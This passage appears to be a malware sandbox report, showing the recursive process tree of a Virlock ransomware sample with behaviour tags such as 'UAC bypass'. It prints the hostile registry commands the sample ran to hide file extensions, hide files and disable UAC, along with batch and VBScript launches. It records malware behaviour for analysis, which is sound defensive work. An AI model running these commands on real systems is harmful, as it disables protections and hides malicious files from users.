        cmd /c ""C:\Users\Admin\AppData\Local\Temp\iqYwwMEE.bat" "C:\Users\Admin\AppData\Local\Temp\2024-03-29_12260695d71062df9ea968a055fdbef2_virlock.exe""
        44⤵
        
        PID:2772
        
        C:\Windows\SysWOW64\cscript.exe
        
        cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
        45⤵
        
        PID:1544
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
        42⤵
        Modifies visibility of file extensions in Explorer
        
        PID:568
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
        42⤵
        Modifies registry key
        
        PID:1512
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
        42⤵
        UAC bypass
        
        PID:2876
        
        C:\Windows\SysWOW64\cmd.exe
        
        cmd /c ""C:\Users\Admin\AppData\Local\Temp\ryEwkkgU.bat" "C:\Users\Admin\AppData\Local\Temp\2024-03-29_12260695d71062df9ea968a055fdbef2_virlock.exe""
        42⤵
        
        PID:1080
        
        C:\Windows\SysWOW64\cscript.exe
        
        cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
        43⤵
        
        PID:2356
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
        40⤵
        Modifies visibility of file extensions in Explorer
        
        PID:2592
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
        40⤵
        Modifies registry key
        
        PID:1376
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
        40⤵
        UAC bypass
        
        PID:3016
        
        C:\Windows\SysWOW64\cmd.exe
        
        cmd /c ""C:\Users\Admin\AppData\Local\Temp\OigsQEMM.bat" "C:\Users\Admin\AppData\Local\Temp\2024-03-29_12260695d71062df9ea968a055fdbef2_virlock.exe""
        40⤵
        
        PID:2892
        
        C:\Windows\SysWOW64\cscript.exe
        
        cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
        41⤵
        
        PID:1380
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
        38⤵
        Modifies visibility of file extensions in Explorer
        Modifies registry key
        
        PID:2744
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
        38⤵
        
        PID:1608
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
        38⤵
        UAC bypass
        
        PID:1540
        
        C:\Windows\SysWOW64\cmd.exe
        
        cmd /c ""C:\Users\Admin\AppData\Local\Temp\ZqQQkwII.bat" "C:\Users\Admin\AppData\Local\Temp\2024-03-29_12260695d71062df9ea968a055fdbef2_virlock.exe""
        38⤵
        
        PID:2732
        
        C:\Windows\SysWOW64\cscript.exe
        
        cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
        39⤵
        
        PID:912
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
        36⤵
        Modifies visibility of file extensions in Explorer
        Modifies registry key
        
        PID:856
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
        36⤵
        
        PID:2092
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
        36⤵
        UAC bypass
        
        PID:2664
        
        C:\Windows\SysWOW64\cmd.exe
        
        cmd /c ""C:\Users\Admin\AppData\Local\Temp\bmcgMAcU.bat" "C:\Users\Admin\AppData\Local\Temp\2024-03-29_12260695d71062df9ea968a055fdbef2_virlock.exe""
        36⤵
        
        PID:1976
        
        C:\Windows\SysWOW64\cscript.exe
        
        cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
        37⤵
        
        PID:1104
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
        34⤵
        Modifies visibility of file extensions in Explorer
        
        PID:2040
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
        34⤵
        
        PID:920
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
        34⤵
        UAC bypass
        Modifies registry key
        
        PID:2036
        
        C:\Windows\SysWOW64\cmd.exe
        
        cmd /c ""C:\Users\Admin\AppData\Local\Temp\NUsAIgMc.bat" "C:\Users\Admin\AppData\Local\Temp\2024-03-29_12260695d71062df9ea968a055fdbef2_virlock.exe""
        34⤵
        
        PID:2172
        
        C:\Windows\SysWOW64\cscript.exe
        
        cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
        35⤵
        
        PID:2368
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
        32⤵
        Modifies visibility of file extensions in Explorer
        
        PID:1612
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
        32⤵
        
        PID:2080
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
        32⤵
        UAC bypass
        
        PID:760
        
        C:\Windows\SysWOW64\cmd.exe
        
        cmd /c ""C:\Users\Admin\AppData\Local\Temp\SmwQMcwE.bat" "C:\Users\Admin\AppData\Local\Temp\2024-03-29_12260695d71062df9ea968a055fdbef2_virlock.exe""
        32⤵
        
        PID:2908
        
        C:\Windows\SysWOW64\cscript.exe
        
        cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
        33⤵
        
        PID:2992
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
        30⤵
        Modifies visibility of file extensions in Explorer
        
        PID:2440
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
        30⤵
        Modifies registry key
        
        PID:2604
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
        30⤵
        UAC bypass
        
        PID:912
        
        C:\Windows\SysWOW64\cmd.exe
        
        cmd /c ""C:\Users\Admin\AppData\Local\Temp\MacAwkok.bat" "C:\Users\Admin\AppData\Local\Temp\2024-03-29_12260695d71062df9ea968a055fdbef2_virlock.exe""
        30⤵
        
        PID:2568
        
        C:\Windows\SysWOW64\cscript.exe
        
        cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
        31⤵
        
        PID:524
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
        28⤵
        Modifies visibility of file extensions in Explorer
        Modifies registry key
        
        PID:2676
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
        28⤵
        Modifies registry key
        
        PID:2380
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
        28⤵
        UAC bypass
        
        PID:2668
        
        C:\Windows\SysWOW64\cmd.exe
        
        cmd /c ""C:\Users\Admin\AppData\Local\Temp\GYcAMcAY.bat" "C:\Users\Admin\AppData\Local\Temp\2024-03-29_12260695d71062df9ea968a055fdbef2_virlock.exe""
        28⤵
        
        PID:1648
        
        C:\Windows\SysWOW64\cscript.exe
        
        cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
        29⤵
        
        PID:664
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
        26⤵
        Modifies visibility of file extensions in Explorer
        
        PID:2672
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
        26⤵
        
        PID:2968
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
        26⤵
        UAC bypass
        
        PID:1832
        
        C:\Windows\SysWOW64\cmd.exe
        
        cmd /c ""C:\Users\Admin\AppData\Local\Temp\nAYEYUck.bat" "C:\Users\Admin\AppData\Local\Temp\2024-03-29_12260695d71062df9ea968a055fdbef2_virlock.exe""
        26⤵
        
        PID:1620
        
        C:\Windows\SysWOW64\cscript.exe
        
        cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
        27⤵
        
        PID:2496
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
        24⤵
        Modifies visibility of file extensions in Explorer
        Modifies registry key
        
        PID:884
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
        24⤵
        
        PID:2976
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
        24⤵
        UAC bypass
        
        PID:1768
        
        C:\Windows\SysWOW64\cmd.exe
        
        cmd /c ""C:\Users\Admin\AppData\Local\Temp\MmoIYEoI.bat" "C:\Users\Admin\AppData\Local\Temp\2024-03-29_12260695d71062df9ea968a055fdbef2_virlock.exe""
        24⤵
        
        PID:2932
        
        C:\Windows\SysWOW64\cscript.exe
        
        cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
        25⤵
        
        PID:2648
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
        22⤵
        Modifies visibility of file extensions in Explorer
        
        PID:1748
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
        22⤵
        Modifies registry key
        
        PID:1836
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
        22⤵
        UAC bypass
        Modifies registry key
        
        PID:2420
        
        C:\Windows\SysWOW64\cmd.exe
        
        cmd /c ""C:\Users\Admin\AppData\Local\Temp\yqIUQoUw.bat" "C:\Users\Admin\AppData\Local\Temp\2024-03-29_12260695d71062df9ea968a055fdbef2_virlock.exe""
        22⤵
        
        PID:1576
        
        C:\Windows\SysWOW64\cscript.exe
        
        cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
        23⤵
        
        PID:908
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
        20⤵
        Modifies visibility of file extensions in Explorer
        
        PID:632
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
        20⤵
        
        PID:584
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
        20⤵
        UAC bypass
        
        PID:2620
        
        C:\Windows\SysWOW64\cmd.exe
        
        cmd /c ""C:\Users\Admin\AppData\Local\Temp\vsoYYQcY.bat" "C:\Users\Admin\AppData\Local\Temp\2024-03-29_12260695d71062df9ea968a055fdbef2_virlock.exe""
        20⤵
        
        PID:548
        
        C:\Windows\SysWOW64\cscript.exe
        
        cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
        21⤵
        
        PID:2832
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
        18⤵
        Modifies visibility of file extensions in Explorer
        
        PID:268
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
        18⤵
        
        PID:2560
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
        18⤵
        UAC bypass
        
        PID:2412
        
        C:\Windows\SysWOW64\cmd.exe
        
        cmd /c ""C:\Users\Admin\AppData\Local\Temp\AyowAkQk.bat" "C:\Users\Admin\AppData\Local\Temp\2024-03-29_12260695d71062df9ea968a055fdbef2_virlock.exe""
        18⤵
        
        PID:2208
        
        C:\Windows\SysWOW64\cscript.exe
        
        cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
        19⤵
        
        PID:1612
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
        16⤵
        Modifies visibility of file extensions in Explorer
        
        PID:1948
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
        16⤵
        Modifies registry key
        
        PID:1736
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
        16⤵
        UAC bypass
        
        PID:2884
        
        C:\Windows\SysWOW64\cmd.exe
        
        cmd /c ""C:\Users\Admin\AppData\Local\Temp\zcMAocQw.bat" "C:\Users\Admin\AppData\Local\Temp\2024-03-29_12260695d71062df9ea968a055fdbef2_virlock.exe""
        16⤵
        
        PID:1696
        
        C:\Windows\SysWOW64\cscript.exe
        
        cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
        17⤵
        
        PID:2628
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
        14⤵
        Modifies visibility of file extensions in Explorer
        
        PID:844
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
        14⤵
        
        PID:2712
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
        14⤵
        UAC bypass
        
        PID:2756
        
        C:\Windows\SysWOW64\cmd.exe
        
        cmd /c ""C:\Users\Admin\AppData\Local\Temp\yisgYwUY.bat" "C:\Users\Admin\AppData\Local\Temp\2024-03-29_12260695d71062df9ea968a055fdbef2_virlock.exe""
        14⤵
        
        PID:2188
        
        C:\Windows\SysWOW64\cscript.exe
        
        cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
        15⤵
        
        PID:2376
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
        12⤵
        Modifies visibility of file extensions in Explorer
        
        PID:2020
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
        12⤵
        Modifies registry key
        
        PID:1516
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
        12⤵
        UAC bypass
        
        PID:2808
        
        C:\Windows\SysWOW64\cmd.exe
        
        cmd /c ""C:\Users\Admin\AppData\Local\Temp\uOcUMckM.bat" "C:\Users\Admin\AppData\Local\Temp\2024-03-29_12260695d71062df9ea968a055fdbef2_virlock.exe""
        12⤵
        
        PID:2240
        
        C:\Windows\SysWOW64\cscript.exe
        
        cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
        13⤵
        
        PID:1356
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
        10⤵
        Modifies visibility of file extensions in Explorer
        Modifies registry key
        
        PID:2236
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
        10⤵
        
        PID:964
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
        10⤵
        UAC bypass
        Modifies registry key
        
        PID:1332
        
        C:\Windows\SysWOW64\cmd.exe
        
        cmd /c ""C:\Users\Admin\AppData\Local\Temp\EWYsMQIo.bat" "C:\Users\Admin\AppData\Local\Temp\2024-03-29_12260695d71062df9ea968a055fdbef2_virlock.exe""
        10⤵
        
        PID:1768
        
        C:\Windows\SysWOW64\cscript.exe
        
        cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
        11⤵
        
        PID:1552
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
        8⤵
        Modifies visibility of file extensions in Explorer
        
        PID:2348
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
        8⤵
        
        PID:868
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
        8⤵
        UAC bypass
        
        PID:2584
        
        C:\Windows\SysWOW64\cmd.exe
        
        cmd /c ""C:\Users\Admin\AppData\Local\Temp\jeAEEkYo.bat" "C:\Users\Admin\AppData\Local\Temp\2024-03-29_12260695d71062df9ea968a055fdbef2_virlock.exe""
        8⤵
        
        PID:2040
        
        C:\Windows\SysWOW64\cscript.exe
        
        cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
        9⤵
        
        PID:1984
      - C:\Windows\SysWOW64\reg.exe
        
        reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
        6⤵
        Modifies visibility of file extensions in Explorer
        
        PID:1200
      - C:\Windows\SysWOW64\reg.exe
        
        reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
        6⤵
        
        PID:1780
      - C:\Windows\SysWOW64\reg.exe
        
        reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
        6⤵
        UAC bypass
        Modifies registry key
        
        PID:2480
      - C:\Windows\SysWOW64\cmd.exe
        
        cmd /c ""C:\Users\Admin\AppData\Local\Temp\AaMsQcoI.bat" "C:\Users\Admin\AppData\Local\Temp\2024-03-29_12260695d71062df9ea968a055fdbef2_virlock.exe""
        6⤵
        
        PID:576
        
        C:\Windows\SysWOW64\cscript.exe
        
        cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
        7⤵
        
        PID:1380
  - - C:\Windows\SysWOW64\reg.exe
      reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
      4⤵
      Modifies visibility of file extensions in Explorer
      PID:2564
  - - C:\Windows\SysWOW64\reg.exe
      reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
      4⤵
      Modifies registry key
      PID:2752
  - - C:\Windows\SysWOW64\reg.exe
      reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
      4⤵
      UAC bypass
      PID:2604
  - - C:\Windows\SysWOW64\cmd.exe
      cmd /c ""C:\Users\Admin\AppData\Local\Temp\dQIYAMQk.bat" "C:\Users\Admin\AppData\Local\Temp\2024-03-29_12260695d71062df9ea968a055fdbef2_virlock.exe""
      4⤵
      Suspicious use of WriteProcessMemory
      PID:288
    - - C:\Windows\SysWOW64\cscript.exe
        
        cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
        5⤵
        
        PID:2156
- C:\Windows\SysWOW64\reg.exe
  reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
  2⤵
  - Modifies visibility of file extensions in Explorer
  - Modifies registry key
  PID:2504
- C:\Windows\SysWOW64\reg.exe
  reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
  2⤵
  PID:2496
- C:\Windows\SysWOW64\reg.exe
  reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
  2⤵
  - UAC bypass
  PID:2544
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\WEsQMYgo.bat" "C:\Users\Admin\AppData\Local\Temp\2024-03-29_12260695d71062df9ea968a055fdbef2_virlock.exe""
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:2428
- - C:\Windows\SysWOW64\cscript.exe
    cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
    3⤵
    PID:2412

C:\Windows\system32\conhost.exe
\??\C:\Windows\system32\conhost.exe "16326793331946017610-20569656331479797671312596223993141459269715910686637725"
1⤵
PID:2348

C:\Windows\system32\conhost.exe
\??\C:\Windows\system32\conhost.exe "-854178251-785669346-1532218607-9349388451213131508917346470-11236279451488704177"
1⤵
PID:2236

C:\Windows\system32\conhost.exe
\??\C:\Windows\system32\conhost.exe "-933659136-1478651412-1387038015-780597778-1750416785-751658957-1929788689-28137269"
1⤵
PID:632

C:\Windows\system32\conhost.exe
\??\C:\Windows\system32\conhost.exe "7107934541914967678-8630752191010852946-15557839261057395122557506037872143028"
1⤵
PID:2232

C:\Windows\system32\conhost.exe
\??\C:\Windows\system32\conhost.exe "-905740786336841824-2065144806-485166348-916848025-42139589-971591825-744145602"
1⤵
PID:2208

C:\Windows\system32\conhost.exe
\??\C:\Windows\system32\conhost.exe "-96286605-1620289793-1755886469-20941863761649701268-633049193-1136970144344854155"
1⤵
PID:844

C:\Windows\system32\conhost.exe
\??\C:\Windows\system32\conhost.exe "-13448916372600569121758212428-302478138-169618855917357174201105731939-1604107470"
1⤵
PID:1648

C:\Windows\system32\conhost.exe
\??\C:\Windows\system32\conhost.exe "19532503471940483370906789853-271063503-2093097607-9776867701533804695-1325856441"
1⤵
PID:2500

C:\Windows\system32\conhost.exe
\??\C:\Windows\system32\conhost.exe "14802429441588475347-754046631361320581383674559-454603502-18080448382059755783"
1⤵
PID:2428

C:\Windows\system32\conhost.exe
\??\C:\Windows\system32\conhost.exe "1847051280-1254068126532777440-11356325241616440922-1767996685973643952-656466159"
1⤵
PID:2744

C:\Windows\system32\conhost.exe
\??\C:\Windows\system32\conhost.exe "-4334128322053494098124046290359239967-5175867421302629149-4511559812003975750"
1⤵
PID:1172

C:\Windows\system32\conhost.exe
\??\C:\Windows\system32\conhost.exe "1758931716-7734768951649651493-1536769599-750504892-838233980-841277534-1008990125"
1⤵
PID:1640

C:\Windows\system32\conhost.exe
\??\C:\Windows\system32\conhost.exe "-11348616231876871044434947636-166317303885691859719967357101500415644386271165"
1⤵
PID:2628

C:\Windows\system32\conhost.exe
\??\C:\Windows\system32\conhost.exe "17417267601889826632-2765156741366335693288498478780364977-9027679181578415608"
1⤵
PID:2884

C:\Windows\system32\conhost.exe
\??\C:\Windows\system32\conhost.exe "1704874171-44234251255804614712960336431312724142565806149-810737439-1579130078"
1⤵
PID:2560

C:\Windows\system32\conhost.exe
\??\C:\Windows\system32\conhost.exe "-4218082032024421876-1301850409188578371019426400318834215531257709835-1557622157"
1⤵
PID:2360

C:\Windows\system32\conhost.exe
\??\C:\Windows\system32\conhost.exe "-2033382270-820971294-290913767-402976435990461284-21058029971201884417-2012174435"
1⤵
PID:1556

C:\Windows\system32\conhost.exe
\??\C:\Windows\system32\conhost.exe "4291758015041238462132503976-183752787513858794301446281940-18214289391574752297"
1⤵
PID:2968

C:\Windows\system32\conhost.exe
\??\C:\Windows\system32\conhost.exe "1834842416147240299-20410754533199320441906992843-1253746512-4866347202125866863"
1⤵
PID:2908

C:\Windows\system32\conhost.exe
\??\C:\Windows\system32\conhost.exe "1793744591113363212047570449-17200652261348048091-517722129945177463-1694763225"
1⤵
PID:1952

C:\Windows\system32\conhost.exe
\??\C:\Windows\system32\conhost.exe "-9783589949187153431589792181106378005110664972111162686489-6191109052126946735"
1⤵
PID:840

C:\Windows\system32\conhost.exe
\??\C:\Windows\system32\conhost.exe "19803716941490226626-6436757041245481483-1776029205-589248180304938177-972905118"
1⤵
PID:596

C:\Windows\system32\conhost.exe
\??\C:\Windows\system32\conhost.exe "-4511715169881515893851137581958305576-2369738601256597562-241645559634683859"
1⤵
PID:1848

C:\Windows\system32\conhost.exe
\??\C:\Windows\system32\conhost.exe "-890065600-19954401691344637181-1186697938-1236344712764462483-831358202-1384505264"
1⤵
PID:2680

C:\Windows\system32\conhost.exe
\??\C:\Windows\system32\conhost.exe "-268637332747203967172299021711820786972101420621201522360-2056737185-1243364773"
1⤵
PID:1608

C:\Windows\system32\conhost.exe
\??\C:\Windows\system32\conhost.exe "1210627668268602221479037369-559545418-1071514987-971166852-5431450651341673994"
1⤵
PID:1104

C:\Windows\system32\conhost.exe
\??\C:\Windows\system32\conhost.exe "977168451353401671-5112482851694055397114099963530598588311330530881131500415"
1⤵
PID:2664

C:\Windows\system32\conhost.exe
\??\C:\Windows\system32\conhost.exe "-764556603-5596314471852785117943920231-100467455-41230042228495908-1832782478"
1⤵
PID:1600

C:\Windows\system32\conhost.exe
\??\C:\Windows\system32\conhost.exe "-17521340271046557201-1058686987588767737-762305663538017740-1404474625-456385148"
1⤵
PID:2964

C:\Windows\system32\conhost.exe
\??\C:\Windows\system32\conhost.exe "-838863398982784361-437137817-5431899581638236894-650127889134641653361952476"
1⤵
PID:3064

C:\Windows\system32\conhost.exe
\??\C:\Windows\system32\conhost.exe "-1674176760-19309845884149800819900888611096835984-1281307915-1222714796-1659951982"
1⤵
PID:1332

C:\Windows\system32\conhost.exe
\??\C:\Windows\system32\conhost.exe "84663558512915097712030836503156025646219176752111168445127-316345830293634636"
1⤵
PID:1276

C:\Windows\system32\conhost.exe
\??\C:\Windows\system32\conhost.exe "-693851285-53422277-1436798509-1729893124-1206124264843466332679646284-865605263"
1⤵
PID:2092

C:\Windows\system32\conhost.exe
\??\C:\Windows\system32\conhost.exe "-1371906532517730221398507176920894593757489099690313339-184385964293502378"
1⤵
PID:1604

C:\Windows\system32\conhost.exe
\??\C:\Windows\system32\conhost.exe "-20040211132182314014568029051342467488-215715551-514917684951560947-588609491"
1⤵
PID:2836

C:\Windows\system32\conhost.exe
\??\C:\Windows\system32\conhost.exe "-11750582431860002537570197729310492145-579092255-20923718061544036104524819067"
1⤵
PID:1992

C:\Windows\system32\conhost.exe
\??\C:\Windows\system32\conhost.exe "967915839-1588528294-904368323674622808-1367403174-1687504066-1560925820-1793901796"
1⤵
PID:2652

C:\Windows\system32\conhost.exe
\??\C:\Windows\system32\conhost.exe "216423813-9494900312789471931877410936-137274759-85263153418577682871071110159"
1⤵
PID:2740

C:\Windows\system32\conhost.exe
\??\C:\Windows\system32\conhost.exe "-893283639-745426971-1182016135-2106175875-1673238665-291954056-8365717431486069472"
1⤵
PID:2036

C:\Windows\system32\conhost.exe
\??\C:\Windows\system32\conhost.exe "108696892382738160-1604126525-3360955172040099816-930439459-1591241481050107350"
1⤵
